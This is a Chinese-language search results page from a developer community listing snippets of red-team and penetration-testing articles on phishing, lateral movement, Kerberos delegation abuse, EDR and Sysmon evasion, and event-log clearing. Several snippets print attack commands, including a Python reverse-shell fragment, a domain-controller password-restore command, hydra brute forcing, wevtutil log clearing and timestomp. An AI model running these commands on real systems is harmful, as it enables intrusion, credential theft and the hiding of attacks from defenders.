首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏全栈程序员必看

    靶机实战(2

    一天一靶机 生活充实而有趣,打算这几天把红日的几个靶机都给撸个遍。打起来还挺有意思。

    69820编辑于 2021-12-13
  • 来自专栏Khan安全团队

    笔记 - 后渗透2

    禁用AV/EDR产品在实践中绝不是一个好主意,最好的办法是绕过它。所有这些命令都需要本地管理权限。

    91320发布于 2021-10-12
  • 来自专栏Khan安全团队

    Tips

    在Windows上使用prtsc键时,taskhost/taskhostw会试图获得对一个不存在的文件的读取权限。

    34130编辑于 2022-04-02
  • 来自专栏Khan安全团队

    利器 - SharpSniper

    通常,参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。

    35520编辑于 2022-07-13
  • 来自专栏渗透测试教程

    - 渗透小技巧

    use auxiliary/admin/cisco/cisco_asa_extrabacon //关于思科的设备,CVE-2016-6366 收集端口: 1.这么收集端口没什么好说,方法就那么几种 2. 收集子域名: 1.收集的意义在于配合收集的cms和端口信息撕开口子 2.看看有没有域传送漏洞,有的话帮你找完 3.多去找找某些api,某些api也可以帮你找全(其所有相关资产)。 ? (2)sql注入 1.不论是前后台,如果可以上传图片,但是上传绕不过,可以考虑图片名改为注入payload,看看有没有二次注入 2.如果存在注入,好好利用bp,get/post切换,参数污染,分块,x-forward-for 2.认清ssrf的作用,像ssrf->getshell真的太少了,都是配合ssrf收集信息打组合拳,就比如配合redis那shell,首先是对面可能存在redis,然后为授权。 因为我们收集到不同的信息会对我们的渗透思路完全不同,内网不像web,你在工作组和在域环境打法是完全不同的,你在域环境找到域控和没找到域控是2回事。但是渗透的本质还是不断地收集信息然后横向。

    1.7K40发布于 2021-07-23
  • 来自专栏Gamma安全实验室

    技巧-网络钓鱼

    前言 涵盖了现在大多数钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜! 1. excel宏执行任意命令 新建一个exel表,然后打开,对准这个右键点击插入宏。 ? 2 Link钓鱼: 随便选择一个应用或者文件,右键点击创建快捷方式,右键打开属性: ? 我们需要更改目标这里的目标,这里的目标路径改成我们的攻击载荷,下面的起始位置可以不更改,基本上没啥影响。 PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item<em>2</em>"

    3.4K10发布于 2021-03-10
  • 来自专栏HACK学习

    | InlineHook技术实现

    mov eax, DWORD PTR ss : [esp + 0x28] mov x, eax mov eax, DWORD PTR ss : [esp + 0x2c + 1; PAddr += *(DWORD*)PAddr+ 4; SetInlineHook((LPBYTE)Test, HookProc,9); Test(1, 2, reg.EBP, ebp } _asm { mov eax, DWORD PTR ss : [esp + 0x28] mov x, eax mov eax, DWORD PTR ss : [esp + 0x2c (BYTE*)Test + 1; PAddr += *(DWORD*)PAddr + 4; SetInlineHook((LPBYTE)PAddr, HookProc,9); Test(1, 2, 3); UnInlineHook(9); Test(1, 2, 3); return 0; } int main() { TestInlineHook(); //Test(1, 2, 3)

    79940发布于 2021-05-14
  • 来自专栏Khan安全团队

    笔记 - 横向移动

    这允许s4u2self,即代表任何人向自己请求 TGS ,仅使用 NTLM 密码哈希。 此属性包含允许在其上使用的 SPN s4u2proxy,即基于现有 TGS(通常是使用 获得的s4u2self)为该服务器请求可转发 TGS 。这有效地定义了允许约束委派的后端服务。 如果s4u2proxy允许而没有s4u2self,则需要用户交互才能从用户那里获取到前端服务的有效 TGS,类似于无约束委派。 # Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN . 在这种情况下,s4u2self和s4u2proxy如上所述用于代表用户请求可转发票证。

    2.4K10发布于 2021-10-12
  • 来自专栏HACK学习

    | Windows命名管道

    就是说相当于需要提供账户名密码这类东西证明身份,非匿名的访问 C2 信道 ? 命名管道还常被用作 C2 信道,通讯执行命令。

    2.5K20发布于 2021-06-24
  • 来自专栏Khan安全团队

    笔记 - 后渗透

    LSASS 被配置为作为受保护进程 (PPL) 运行,您可以使用 PowerShell 进行查询。

    1.3K41发布于 2021-10-12
  • 来自专栏渗透测试红队专栏

    实战攻防(一)

    大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写攻防相关的文章了,那么近期将带来 “实战攻防技术” 系列的文章。 当前行业内组织的 “蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以的视角去阐述技术思想。 与常规的渗透测试相比,攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 C2上,Linux上线CobaltStrike的方式可以使用CrossC2插件进行,这里仅作安全研究,所以不做此操作。

    1K50发布于 2021-08-23
  • 来自专栏潇湘信安

    RequestTemplate内网渗透工具

    RequestTemplate是一款两端并用的渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。 客户端用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱的一环。 项目地址: https://github.com/1n7erface/RequestTemplate 0x01 应用场景 蓝对抗中的内网利器 甲方建设中内网的自查帮手 0x02 具备特点 网段探测 代理管理 2. 目标管理 3.

    1.7K30编辑于 2022-09-22
  • 来自专栏Khan安全团队

    横向 - 神奇小妙招

    2、用#MSTeams绕过#EDR 将有效负载复制到: %userprofile%\AppData\Local\Microsoft\Teams\current\ 然后: %userprofile

    44620编辑于 2022-01-27
  • 来自专栏肖萧然最秀

    常用命令

    ^><nul>1d13.txt 方法2 echo qaxnb>1we.txt 追加内容 echo qaxnb>>1we.txt 不换行追加 set /p="121d2">>a.txt 规避空格 echo 用上面的 hex 还原目标域控机器账户密码 python3 restorepassword.py Dc02@Dc02 -target-ip 172.23.119.120 -hexpass daf1d2acc25d2e54218921737a40d58192b9bcdf089ddbeaf9f7931571b07916f96e2c51d8d00f56d2440c13c0e5586e2dafd1669e37131 s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' php C:// -h #查看帮助 timestomp -v C://2.txt #查看时间戳 timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt #选择网卡 开始抓包 sniffer_stats 2 #查看状态 sniffer_dump 2 /tmp/lltest.pcap #导出pcap数据包 sniffer_stop 2 #停止抓包

    5.2K50编辑于 2023-10-13
  • 来自专栏FreeBuf

    渗透项目之GoldenEye

    接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该文章都能学习到一些的技巧和知识。 2、挖掘HTTP服务 访问:http://192.168.4.202,显示的文本提示了一条线索,它说进入到/sev-home/目录中。 dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3 -L 引用用户密码文本 -P 引用密码文本 等待2~ s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 保存后当对方服务器环境在某个点触发条件就会执行该命令 五、总结 通过以上的学习,我们认知了一些的小技巧的技术手段,完成了从信息收集到内核提权项目落地,学习到了非常多的技巧,例如nmap、hysra、pop3-nc、MSF、EXP等等的编译和使用提权等,

    2K20编辑于 2022-02-23
  • 来自专栏FreeBuf

    技巧:绕过Sysmon检测

    Sysmon和Windows事件日志都是防御者中极为强大的工具。它们非常灵活的配置使他们可以深入了解设备上的活动,从而使检测攻击者的过程变得更加容易。出于这个原因,我将带领您完成击败他们的旅程;)

    1.6K20发布于 2020-05-14
  • 来自专栏鸿鹄实验室

    技巧--winAPI添加用户

    . // UF_SCRIPT: required // ui.usri1_name = argv[2]; ui.usri1_password = argv[2]; ui.usri1 NERR_Success) fwprintf(stderr, L"User %s has been successfully added on %s\n", argv[2]

    1.5K20发布于 2021-04-15
  • 来自专栏Gamma安全实验室

    战术-躲避日志检查

    禁用Windows事件日志记录,是最常规手法,为了减少可用于安全人员检测和审核的数据量,提高活动的隐蔽性,人员可以禁用Windows事件日志记录。 cl security wevtutil cl Setup wevtutil cl System wevtutil cl Aplication wevtutil cl Forwarded Events 2. 2. 获取线程列表并标识Windows事件日志服务线程ID。 3. 终止有关Windows事件日志服务的所有线程。 ? 但是有点风险,我用windows 7 sp2 测试,会出现开不了鸡的情况。 6.Metasploit 在Metasploit会话中,可以从事件查看器中清除应用程序,安全性和系统日志。 执行命令 clearev 技术博大精深,值得好好钻研,细品,每天进步一点点,日积月累也是很大的技术积累。 欢迎大家加入知识星球交流学习,感受网络安全的魅力。 ? ? END

    1.4K20发布于 2021-04-28
  • 来自专栏谢公子学安全

    测试之邮箱打点

    2)通过扫描子域名的的方式找到邮件入口 这里扫描子域名的工具有很多,如Sublist3r、TeeMO、LangSrcCurise、挖掘机等不一一举例。 https://mailtester.com/testmail.php (2)verifyemail这款工具可批量验证邮箱。 在有SPF的情况下,就需要绕过SPF,可以使用swaks+smtp2go,需要借助到邮件托管平台来绕过SPF监测。 SMTP2GO的配置: 需要建立账户和验证域名。 -au user -ap pass 02 钓鱼文件制作 1)传统宏文件 2)CHM钓鱼 新建一个文件夹将以下代码复制到index.html中,然后EasyCHM工具生成就可以了。 另外还有利用目标登录口的钓鱼页面来窃取各种, Vpn , Mail , OA ,账号密码等,实际钓鱼方式与细节非常多不一一举例了。

    1.4K20编辑于 2022-01-20
  • 来自专栏Gamma安全实验室

    技巧-常规横向手法

    前言 域内横向移动技术是作战在域内最基本技术之一,人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。 2. 然后让跳板机使用copy命令远程操作,将metasploit生成的payload文件Gamma.exe复制到目标主机DC系统C盘中。 3. 执行原理: 1.通过ipc$连接,copy psexecsvc.exe到目标机器 2.通过服务管理SCManager远程创建psexecsvc服务,并启动服务。 2.如果提供了账号密码,则用这个账号密码建立一个到目标的IPC连接。 3.WMI会建立一个共享文件夹,用于远程读取命令执行结果。 2、防火墙对5986、5985端口开放。

    2.9K20发布于 2021-07-01
领券